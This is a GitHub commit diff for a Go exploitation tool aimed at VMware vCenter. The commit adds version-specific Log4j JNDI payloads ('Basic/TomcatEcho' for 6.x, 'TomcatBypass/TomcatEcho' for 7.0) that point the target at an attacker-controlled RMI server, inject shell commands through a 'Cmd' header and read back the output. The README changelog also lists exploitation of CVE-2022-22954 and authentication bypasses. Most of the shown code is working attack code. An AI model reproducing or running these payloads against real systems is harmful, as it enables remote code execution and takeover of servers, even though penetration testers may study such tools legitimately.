v1.3.3

Schira4396 · Oct 10, 2022 · 6b37a97 · 6b37a97
1 parent 831427a
commit 6b37a97
Show file tree

Hide file tree

Showing 5 changed files with 27 additions and 5 deletions.
diff --git a/README.md b/README.md
@@ -71,6 +71,7 @@ V1.2 增加了针对Vcenter的log4j检测和验证能力
 V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能，包括CVE-2022-22954 远程命令执行；CVE-2022-22972、CVE-2022-31656身份鉴别绕过
 V1.3.1 修复了检测log4j时忽略了端口的问题，有的服务会更改默认的443端口
 V1.3.2 修改了针对log4j的利用方式，通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。
+V1.3.3 增加了对6.7和7.0版本的区别利用，7.0必须使用tomcatbypass，而6.7使用普通的basic就行了
 ...
 ```
 
diff --git a/go.mod b/go.mod
@@ -3,6 +3,7 @@ module GO_VCENTER
 go 1.18
 
 require (
+	github.com/beevik/etree v1.1.0 // indirect
 	github.com/buger/jsonparser v1.1.1 // indirect
 	github.com/cheekybits/genny v1.0.0 // indirect
 	github.com/fatih/color v1.13.0 // indirect

diff --git a/go.sum b/go.sum
@@ -9,6 +9,8 @@ dmitri.shuralyov.com/state v0.0.0-20180228185332-28bcc343414c/go.mod h1:0PRwlb0D
 git.apache.org/thrift.git v0.0.0-20180902110319-2566ecd5d999/go.mod h1:fPE2ZNJGynbRyZ4dJvy6G277gSllfV2HJqblrnkyeyg=
 github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
 github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c=
+github.com/beevik/etree v1.1.0 h1:T0xke/WvNtMoCqgzPhkX2r4rjY3GDZFi+FjpRZY2Jbs=
+github.com/beevik/etree v1.1.0/go.mod h1:r8Aw8JqVegEf0w2fDnATrX9VpkMcyFeM0FhwO62wh+A=
 github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
 github.com/bradfitz/go-smtpd v0.0.0-20170404230938-deb6d6237625/go.mod h1:HYsPBTaaSFSlLx/70C2HPIMNZpVV8+vt/A+FMnYP11g=
 github.com/buger/jsonparser v0.0.0-20181115193947-bf1c66bbce23/go.mod h1:bbYlZJ7hK1yFx9hf58LP0zeX7UjIGs20ufpu3evjr+s=

diff --git a/main.go b/main.go
@@ -117,7 +117,14 @@ func main() {
 					usage()
 					os.Exit(0)
 				} else {
-					log4jcenter.Exec_cmd(url, rmi, command)
+					if log4jcenter.Exec_cmd(url, rmi, command, "6") {
+						//
+					} else {
+						fmt.Println("[-] Vcenter 6.X paylaod 利用失败，尝试7.0")
+						if !log4jcenter.Exec_cmd(url, rmi, command, "7") {
+							fmt.Println("[-] 回显失败，目标不存在漏洞或其他原因.")
+						}
+					}
 				}
 
 			} else {

diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go
@@ -127,14 +127,23 @@ func exploit(url, rmiserver string) {
 
 }
 
-func Exec_cmd(url, rmiserver, command string) {
+func Exec_cmd(url, rmiserver, command, version string) bool {
 	host := rmiserver
 	client := req.C()
 	client.EnableForceHTTP1()
 	client.EnableInsecureSkipVerify()
 	client.SetTimeout(2 * time.Second)
 	// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理，burp2022.8会启用http2，导致vcenter报错403
-	rmi_server := fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
+	rmi_server := ""
+	cmd := ""
+	if version == "6" {
+		rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host)
+		cmd = command + " && echo nmsl"
+	} else {
+		rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
+		cmd = command + ";echo 'nmsl'"
+	}
+
 	myheader := map[string]string{
 		"User-Agent":                "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
 		"Accept":                    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
@@ -145,7 +154,7 @@ func Exec_cmd(url, rmiserver, command string) {
 		"Sec-Fetch-Mode":            "navigate",
 		"Sec-Fetch-Site":            "none",
 		"Sec-Fetch-User":            "?1",
-		"Cmd":                       command + ";echo 'nmsl'",
+		"Cmd":                       cmd,
 	}
 
 	resp, err := client.R().
@@ -166,8 +175,10 @@ func Exec_cmd(url, rmiserver, command string) {
 		result = strings.Split(result, "nmsl")[0]
 		result = strings.TrimRight(result, "\n")
 		fmt.Println(result)
+		return true
 	} else {
-		fmt.Println("[-] 回显失败，目标不存在漏洞或其他原因.")
+
+		return false
 	}
 
 }